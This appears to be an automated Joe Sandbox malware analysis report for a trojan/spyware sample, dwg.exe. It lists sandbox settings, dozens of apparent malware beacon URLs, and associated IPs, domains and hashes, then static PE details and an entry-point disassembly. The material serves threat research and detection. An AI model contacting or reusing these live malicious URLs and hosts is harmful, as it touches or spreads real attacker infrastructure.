                                                              		395954LEASEWEB-USA-LAX-11UStrue
                                                              3.223.115.185
                                                              		unknownUnited States
                                                              		14618AMAZON-AESUSfalse

                                                              General Information

                                                              Joe Sandbox Version:31.0.0 Emerald
                                                              Analysis ID:357209
                                                              Start date:24.02.2021
                                                              Start time:09:53:01
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 9m 2s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:dwg.exe
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:27
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:1
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@7/0@13/8
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 50.5% (good quality ratio 43.5%)
                                                              • Quality average: 70.7%
                                                              • Quality standard deviation: 33.9%
                                                              HCA Information:
                                                              • Successful, ratio: 64%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .exe
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                              • TCP Packets have been reduced to 100
                                                              • Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.64.90.137, 92.122.145.220, 52.255.188.83, 104.43.193.48, 51.104.139.180, 184.30.20.56, 8.253.207.121, 8.248.115.254, 67.26.73.254, 8.248.137.254, 8.248.119.254, 92.122.213.247, 92.122.213.194, 20.54.26.129
                                                              • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/357209/sample/dwg.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              No simulations

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              192.0.78.25IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                              • www.wmarquezy.com/bw82/?9rjHF6y=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YeEGiH+FcCyQowbqQ==&lX9d=p48hVnrp1tqPRT7P
                                                              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                              • www.glasshouseroadtrip.com/bw82/?RFQx_=9eHfuSy5bsinEXEf9UcXOob2js7MmdckS7hVoe2yzKUXnEaN1LaM8/a2W/lIeY/LicAkBw==&GZopM=kvuD_XrpiP
                                                              IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                              • www.vagrantmind.com/gypo/?UrjPuprX=a22oXTEFK1VaKxP6jotNX9moxeWCA++9mvVJflp0ux1+Oqp3qAY+htsSgKT64ou7evePhg==&nnLx=UBZp3XKPefjxdB
                                                              D6ui5xr64I.exeGet hashmaliciousBrowse
                                                              • www.alexcristal.com/kre/?FDHHVLz=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlPxZTSDnQnyx&Rb=VtX4-
                                                              9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                              • www.alexcristal.com/kre/?aR-8_FK0=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlMRjDDjfKAT2&UlPt=DVohLl3xOrmlMF
                                                              po.exeGet hashmaliciousBrowse
                                                              • www.spanishjaponia.com/wtb/?tdcxfR=/SLohMkaSme8KQmscEO5zyeff+NH4C7nb7Kbu7K9qBGaaLOXNqJ/IyUS4tswlt55UVBx&DxoHn=2daDG
                                                              SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                                                              • www.brightandfreshfaces.com/css/?X2MhMfE0=ZN3ViUDOzxg5uhKqZwbFMgY8qo8vAnJC8OVwb1xkx9iwE6Y5op56c5mUT7DJAYlQEeIN&8p=EZTP7L
                                                              FEB_2021.EXEGet hashmaliciousBrowse
                                                              • www.leadeligey.com/bw82/?rp=vUh86D2kaUcvG8cSXUIE+TYOTfOFz6ihzRiGvCHG7B+/lKZzNCz3xlSTvMpIR1S+NdhZ&RR=YrHlp8D
                                                              VESSEL SPECIFICATION 2021.exeGet hashmaliciousBrowse
                                                              • www.v-surf-boards.com/thg/?hdmTvBAH=vedIkwMGAXbyu6oNrwAvvXp483A8bH0EhwZ5FQQQ4sr9cn5ccMruY6e7Q8V7TpjHwSYA&BR-tMX=XPJtkJ38
                                                              Docs.exeGet hashmaliciousBrowse
                                                              • www.w-ciszy-serca.com/mph/?BXnXAP=YrhH0RRxT8EL1Dl0&2d8=HhP/jN+N/sXTaZ8/3fGnc0oK8/ih6OJXlCeyiM3x1xpWLsZL7bbd6eZCGkHpoe1MVPjf
                                                              8nxKYwJna8.exeGet hashmaliciousBrowse
                                                              • www.treningi-enduro.com/csv8/?OjKL3=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&UT=EhUhb4
                                                              Xi4vVgHekF.exeGet hashmaliciousBrowse
                                                              • www.newfacesatv.info/rina/?GFQL=ppFJhxZ/poTzDSMGT1HJyUg3NUxhm/dyZyRA539kIehONzPOa9y11HW9paxI3u+DZB07&wFN0DX=UtX8E
                                                              hkcmd.exeGet hashmaliciousBrowse
                                                              • www.glasshouseroadtrip.com/bw82/?FVWl=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&AlO=O2MtmfRxc
                                                              2Debit Note_OwnersInvoices.exeGet hashmaliciousBrowse
                                                              • www.kazancsere.net/ivay/?NrQLEP=D48x&1bz=aaBEw9Yir1+hkeWoWLH1LjL9H2PhIHEM/4MpJ31it9FOz57KTCmY8+Kffl97ACZ0KQ0a
                                                              YWrrcqVAno.exeGet hashmaliciousBrowse
                                                              • www.glasshouseroadtrip.com/bw82/?u8iLW=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&OhNhA=9rUlSVPXQJJ
                                                              j64eIR1IEK.exeGet hashmaliciousBrowse
                                                              • www.treningi-enduro.com/csv8/?Bz=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&R0G=dhrxP2v88TRtsx
                                                              Order confirmation 64236000000025 26.01.2021.exeGet hashmaliciousBrowse
                                                              • www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH
                                                              D6mimHOcsr.exeGet hashmaliciousBrowse
                                                              • www.wmarquezy.com/bw82/?7n=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YS9KDr+Saej&RZ=Y4C4ZlKPDRhPDXy
                                                              r.exeGet hashmaliciousBrowse
                                                              • www.andrewsreadingjournal.com/uds2/?_jPlXT=HdLSVyUFGLZERDc21vAze+eEMrorFA8CuNZ+YPXMfnOMoW52wWx899FazcdJxWS7BsXFqvIALA==&n4=iN68RdPpj
                                                              yxYmHtT7uT.exeGet hashmaliciousBrowse
                                                              • www.treningi-enduro.com/csv8/?Aro=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBd0U2iZNRBIldZSbhw==&EHU40X=gbWtoXjpHB
                                                              142.250.185.179orders.exeGet hashmaliciousBrowse
                                                              • www.apollovia.com/ni6e/?W6=v2jPPKbuW0OQGz4sr1wZQDMPp20CFggp8t94yVUJyg4jQj+DNzGPVR/b/eiBo+fiU7a34C4+xg==&UlPt=GVoxsVvHVpd8Sl
                                                              vB1Zux02Zf.exeGet hashmaliciousBrowse
                                                              • www.nikolaichan.com/bw82/?9rn=Ch2H98AXZPNlB&jH5XY=nYWM/rwSzX9MyPPoZtrUCAZuUhwRv7E+HNbrnomLB0MgbyAj2S+JrZFjkPtrBRYAKM0rV+KW/g==
                                                              34.102.136.180orders.exeGet hashmaliciousBrowse
                                                              • www.suncobrayoga.com/ni6e/?W6=+pZLjlAoRu3DtzXq35lSkEUB/ZsZHJe08VokdK2HVDHLsmWw5RNCvrmnDtoZrYQiiN4bm+0CXw==&UlPt=GVoxsVvHVpd8Sl
                                                              Order List - 022321-xlxs.exeGet hashmaliciousBrowse
                                                              • www.hk-attorneys.com/uqf5/?Y4pXFx5x=Dg97rDlyoxn6rzyVbv3B7zG329WThiiFJjF/QU5oHVDRmmZSVK6c1XVEPf5rJpTqyNbYXr1Rqw==&BR-=UTjHnDN0Jp9hlD
                                                              9VZe9OnL4V.exeGet hashmaliciousBrowse
                                                              • www.vio-lence-official.com/mjs/?ohoDP=Szrhs8&EzrxBfhH=Km50rYfCIMLkr6cNBQUAIfaJzg7DBzOfrqOCbjSFoXRiVQSa2PRHXyZRZ9uV6+yeKg7N
                                                              3zutY8IPBS.exeGet hashmaliciousBrowse
                                                              • www.chapelcouture.com/ffw/?uZCX=XPjPaXeHqZ5XiDl&Jzr8URRX=Q3EGYcSU8t2GK6ftjW66hePdz5cilHQXw0NtnM1D8Yj3A1BwaX/+ESmEZzWdZeCCWyTt
                                                              IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                              • www.srcsvcs.com/bw82/?9rjHF6y=idg9JX97F3eVuJ82V/BLVAmaLrIGTHqm4FsH2lIA1Y64HTHcmGyQxV9x71/09hThPInxOEDyHA==&lX9d=p48hVnrp1tqPRT7P
                                                              U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                              • www.wholesalerbargains.com/nsag/?GVgT1=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU4mnryJvfB01hf9UaA==&6l=SlSp
                                                              Upit za narud#U00c5#U00bebinu 02242021.PDFxx.exeGet hashmaliciousBrowse
                                                              • www.theliveshoppingexpo.com/nang/?jPI0=Knh8&txo8nz-=S4xOVIVtHeyPueihJCJoAgs1xKTbprsh/R6+EFDKAdYqsBA5xTBg6oeDaqwim7e1l7ecSZoRyw==
                                                              vB1Zux02Zf.exeGet hashmaliciousBrowse
                                                              • www.gallerybrows.com/bw82/?jH5XY=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k464D184/Ry1q3SvWwA==&9rn=Ch2H98AXZPNlB
                                                              transferir copia_98087.exeGet hashmaliciousBrowse
                                                              • www.shroomsdrop.com/8zdn/?kH=eGnYEUgg+wSQcZ375yCgdfFf6E1Kt+cpyPOB6e9JmwPPtBsaC8CQtumAL6bFnIfy9ObU&Bld=UVCtYPUHlPSP
                                                              cryptedprof.exeGet hashmaliciousBrowse
                                                              • www.thatlocaljawn.com/rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk
                                                              MT OCEAN STAR ISO 8217 2005.xlsxGet hashmaliciousBrowse
                                                              • www.hattonpalacejewellery.com/67d/?cDK=W2Z2UcqSFcwA3YJY0Xi1zX0akAe1ObC272eZaT9vn/sHgfwkHiKnNOLEeBBq/HqgrL2ZGA==&PBR=dpddZ
                                                              0O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                                              • www.fertinvitro.doctor/uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX
                                                              Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                                              • www.sweetpopntreatz.com/blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L
                                                              lpdKSOB78u.exeGet hashmaliciousBrowse
                                                              • www.havemercyinc.net/4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha
                                                              vBugmobiJh.exeGet hashmaliciousBrowse
                                                              • www.activagebenefits.net/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI
                                                              ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                              • www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src
                                                              NewOrder.xlsmGet hashmaliciousBrowse
                                                              • www.covidwatcharizona.com/tub0/?azuxWju=dEK3j7mWBeQXl2zlSZSqDcFEW4EdlZEYoS0+mEVRU2HuA7A7T/ky1yECx94kGVXSwos3qg==&0dt=YtdhwPcHS
                                                              Order_20180218001.exeGet hashmaliciousBrowse
                                                              • www.houstoncouplesexpert.com/seon/?EJBpf8l=ojsb3jKq/XKh64QU9jx/ITCiT4+67gOjnvEpe+kxWJrzMHvdGcv1c3rSoEz5gk4FhTBQ&kDKHiZ=QFNTw2k
                                                              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                              • www.rizrvd.com/bw82/?RFQx_=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&GZopM=kvuD_XrpiP
                                                              ORDER LIST.xlsxGet hashmaliciousBrowse
                                                              • www.speedysnacksbox.com/4qdc/?jpaha=oetlJbtkpt9RC07gzGtc819EDOSw/wKhNDKeGQ7agYbSWM8ZAAA074MmVo5ceZhU2bos5Q==&3fz=fxopBn3xezt4N4a0

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com0O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              lpdKSOB78u.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              Order_20180218001.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              shed.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              IMG_7189012.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              Shinshin Machinery.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              InterTech_Inquiry.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              urBYw8AG15.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              fuS9xa8nq6.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              MV SEIYO FORTUNE REF 27 - QUOTATION.xlsxGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              executable.2772.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              PO-098907654467.xlsxGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              Docs.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              Vghj5O8TF2rYH85.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              SecuriteInfo.com.generic.ml.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              DOC_KDB_06790-80.xlsxGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              IRS_Microsoft_Excel_Document_xls.jarGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              RFQ.# PO41000202103.exeGet hashmaliciousBrowse
                                                              • 3.223.115.185
                                                              ghs.googlehosted.comorders.exeGet hashmaliciousBrowse
                                                              • 142.250.185.179
                                                              vB1Zux02Zf.exeGet hashmaliciousBrowse
                                                              • 142.250.185.179
                                                              RFQ.exeGet hashmaliciousBrowse
                                                              • 142.250.185.179
                                                              YSZiV5Oh2E.exeGet hashmaliciousBrowse
                                                              • 216.58.206.51
                                                              HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exeGet hashmaliciousBrowse
                                                              • 142.250.180.179
                                                              aUWqpYqmXT.exeGet hashmaliciousBrowse
                                                              • 142.250.179.147
                                                              2021_036,pdf.exeGet hashmaliciousBrowse
                                                              • 172.217.20.243
                                                              P.O 5282.exeGet hashmaliciousBrowse
                                                              • 172.217.20.243
                                                              Details.exeGet hashmaliciousBrowse
                                                              • 172.217.20.243
                                                              QgWarCS5Z4.exeGet hashmaliciousBrowse
                                                              • 172.217.20.243
                                                              attach-563539606.xlsGet hashmaliciousBrowse
                                                              • 172.217.20.243
                                                              30 percento,pdf.exeGet hashmaliciousBrowse
                                                              • 172.217.20.243
                                                              wl0mBiXkW1.exeGet hashmaliciousBrowse
                                                              • 216.58.207.179
                                                              PR Agreement FEB2021.xlsxGet hashmaliciousBrowse
                                                              • 216.58.207.179
                                                              Purchase#Order_BC012356.pdf.exeGet hashmaliciousBrowse
                                                              • 216.58.207.179
                                                              DHL eShipment invoice_pdf.exeGet hashmaliciousBrowse
                                                              • 216.58.207.179
                                                              vt5WM7St45.exeGet hashmaliciousBrowse
                                                              • 216.58.207.147
                                                              KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                                              • 216.58.207.179
                                                              NsNu725j8o.exeGet hashmaliciousBrowse
                                                              • 172.217.17.147
                                                              R85exvLDws.rtfGet hashmaliciousBrowse
                                                              • 172.217.17.147

                                                              ASN

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              CLOUDFLARENETUSk_cr.dllGet hashmaliciousBrowse
                                                              • 104.20.184.68
                                                              orders.exeGet hashmaliciousBrowse
                                                              • 172.67.129.33
                                                              PO No. 2995_pdf.exeGet hashmaliciousBrowse
                                                              • 172.67.172.17
                                                              NEW ORDER.exeGet hashmaliciousBrowse
                                                              • 172.67.172.17
                                                              9VZe9OnL4V.exeGet hashmaliciousBrowse
                                                              • 23.227.38.74
                                                              CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                              • 172.67.172.17
                                                              payment confirmation 0029175112.exeGet hashmaliciousBrowse
                                                              • 172.67.172.17
                                                              Payment Advise_pdf.exeGet hashmaliciousBrowse
                                                              • 104.21.71.230
                                                              Drawing No 2000168004_pdf.exeGet hashmaliciousBrowse
                                                              • 172.67.172.17
                                                              PO_210224.exeGet hashmaliciousBrowse
                                                              • 104.21.34.214
                                                              GTS_21_9018_ORDER_pdf.exeGet hashmaliciousBrowse
                                                              • 172.67.172.17
                                                              FOB offer_1164087223_I0133P2100363812.PDF.exeGet hashmaliciousBrowse
                                                              • 104.21.19.200
                                                              Telex Transfer.exeGet hashmaliciousBrowse
                                                              • 104.21.19.200
                                                              DHL Shipping Documents PO1001910 .exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              Purchase Order KV_RQ-7436819.docGet hashmaliciousBrowse
                                                              • 104.21.71.230
                                                              lVDGaDH.dllGet hashmaliciousBrowse
                                                              • 104.20.184.68
                                                              PRODUCT ENQUIRY ( 21001025 ) PART NO EPN518.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              HUIBAO PROFORMA INVOICE 07092021.pdf.exeGet hashmaliciousBrowse
                                                              • 104.21.19.200
                                                              Attach_1760138734_477205649.xlsGet hashmaliciousBrowse
                                                              • 104.22.18.188
                                                              551UmZ61Ts.exeGet hashmaliciousBrowse
                                                              • 1.3.21.169
                                                              NETLABFRCCMA Case GAJB00138471-21.pdf.exeGet hashmaliciousBrowse
                                                              • 45.153.203.81
                                                              INV_PR2201.docmGet hashmaliciousBrowse
                                                              • 45.153.203.55
                                                              Proof of Payment_DLMV2S6G.pdf.exeGet hashmaliciousBrowse
                                                              • 45.153.203.81
                                                              dwg.exeGet hashmaliciousBrowse
                                                              • 45.153.203.33
                                                              Quote#20210914.xlsGet hashmaliciousBrowse
                                                              • 45.153.203.54
                                                              Quote#20210914.xlsGet hashmaliciousBrowse
                                                              • 45.153.203.54
                                                              SecuriteInfo.com.Generic.mg.9829d2aa6885c690.exeGet hashmaliciousBrowse
                                                              • 45.153.203.134
                                                              invoice.xlsGet hashmaliciousBrowse
                                                              • 45.153.203.134
                                                              dwg.exeGet hashmaliciousBrowse
                                                              • 45.153.203.134
                                                              http://45.153.203.222Get hashmaliciousBrowse
                                                              • 45.153.203.222
                                                              file.exeGet hashmaliciousBrowse
                                                              • 45.153.203.141
                                                              Completed Finance Application and Required Documents.DOC.exeGet hashmaliciousBrowse
                                                              • 45.153.203.141
                                                              Product_item.exeGet hashmaliciousBrowse
                                                              • 45.153.203.141
                                                              gunzipped.exeGet hashmaliciousBrowse
                                                              • 45.153.203.141
                                                              Payment Advice - Advice RefGLVA05109502 .PDF.exeGet hashmaliciousBrowse
                                                              • 45.153.203.141
                                                              Notification from SARS, Defaulter letter.PDF.exeGet hashmaliciousBrowse
                                                              • 45.153.203.141
                                                              file.exeGet hashmaliciousBrowse
                                                              • 45.153.203.141
                                                              AUTOMATTICUSIKtgCGdzlg.exeGet hashmaliciousBrowse
                                                              • 192.0.78.25
                                                              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                              • 192.0.78.25
                                                              unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                              • 192.0.84.247
                                                              AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                              • 192.0.78.24
                                                              IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                              • 192.0.78.25
                                                              D6ui5xr64I.exeGet hashmaliciousBrowse
                                                              • 192.0.78.25
                                                              AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                              • 192.0.78.24
                                                              P.O-48452689535945.exeGet hashmaliciousBrowse
                                                              • 192.0.78.24
                                                              CMahQwuvAE.exeGet hashmaliciousBrowse
                                                              • 192.0.78.24
                                                              c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                              • 192.0.78.24
                                                              zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                              • 192.0.78.24
                                                              kgozmovHpY.exeGet hashmaliciousBrowse
                                                              • 192.0.78.24
                                                              9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                              • 192.0.78.25
                                                              ransomware.exeGet hashmaliciousBrowse
                                                              • 192.0.78.12
                                                              po.exeGet hashmaliciousBrowse
                                                              • 192.0.78.25
                                                              SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                                                              • 192.0.78.25
                                                              ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                              • 192.0.78.12
                                                              FEB_2021.EXEGet hashmaliciousBrowse
                                                              • 192.0.78.25
                                                              PvvkzXgMjG.exeGet hashmaliciousBrowse
                                                              • 192.0.78.24
                                                              Doc_87215064.htmGet hashmaliciousBrowse
                                                              • 192.0.76.3

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              No created / dropped files found

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):5.73680598005326
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:dwg.exe
                                                              File size:98304
                                                              MD5:92628cc54ad5d8ffed4f28f9bf9f80f8
                                                              SHA1:586c6da770b640a04ad9f5d205308f5a2f84e42b
                                                              SHA256:6e6fa2f1d1b7e3c37b6c7a18a4bd750e6ca980741c87af931c17d2ed7e469c3e
                                                              SHA512:4464a4cc1b30cc40448a74ec6edc960c313a4e21c73ea74630719218927890eefbe5a8b804a45258fda23a490bde553fad7ff2dcc8cf39666afb787ab13cc741
                                                              SSDEEP:1536:CbLxrswd2n+CUh7PPmfgvu9EYdIrR8mnPORHOmlKmbL:mLBk+fPj4hIrZnPWuEL
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L.....{O.................0...P......H........@....@

                                                              File Icon

                                                              Icon Hash:10b0b2095489f81e

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x401348
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                              DLL Characteristics:
                                                              Time Stamp:0x4F7B9985 [Wed Apr 4 00:44:53 2012 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:c6ebaa5f331077d9c6c3ae892d7a39ce

                                                              Entrypoint Preview

                                                              Instruction
                                                              push 0040428Ch
                                                              call 00007F95DCE99025h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              xor byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              inc eax
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [edx+294CC6F7h], ch
                                                              int3
                                                              out 46h, al
                                                              mov eax, dword ptr [30A90AA4h]
                                                              jmp 00007F95DCEA89B9h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add dword ptr [eax], eax
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              dec esi
                                                              inc ebp
                                                              push esp
                                                              push esi
                                                              push edx
                                                              dec ebx
                                                              inc edx
                                                              dec edi
                                                              dec esp
                                                              push ebx
                                                              dec edx
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add bh, bh
                                                              int3
                                                              xor dword ptr [eax], eax
                                                              and byte ptr [ecx+263365ABh], cl
                                                              fsubp st(7), st(0)
                                                              dec edx
                                                              and dword ptr [esi-25h], 4EBB4744h
                                                              leave
                                                              sbb dword ptr [ecx-7BF2A973h], esp
                                                              imul eax, dword ptr [ebx-6Bh], 2Dh
                                                              out E7h, eax
                                                              in eax, dx
                                                              sbb esi, dword ptr [esi-0Bh]
                                                              cmp cl, byte ptr [edi-53h]
                                                              xor ebx, dword ptr [ecx-48EE309Ah]
                                                              or al, 00h
                                                              stosb
                                                              add byte ptr [eax-2Dh], ah
                                                              xchg eax, ebx
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              and ch, byte ptr [esi]
                                                              add byte ptr [eax], al
                                                              clc
                                                              daa
                                                              add byte ptr [eax], al
                                                              add byte ptr [616E6100h], cl
                                                              arpl word ptr [ecx+6Dh], sp
                                                              jo 00007F95DCE990A6h
                                                              imul esp, dword ptr [ebx+61h], 0D006C6Ch
                                                              add dword ptr [esi], ecx
                                                              add byte ptr [esi+6Fh], cl

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x137240x3c.text
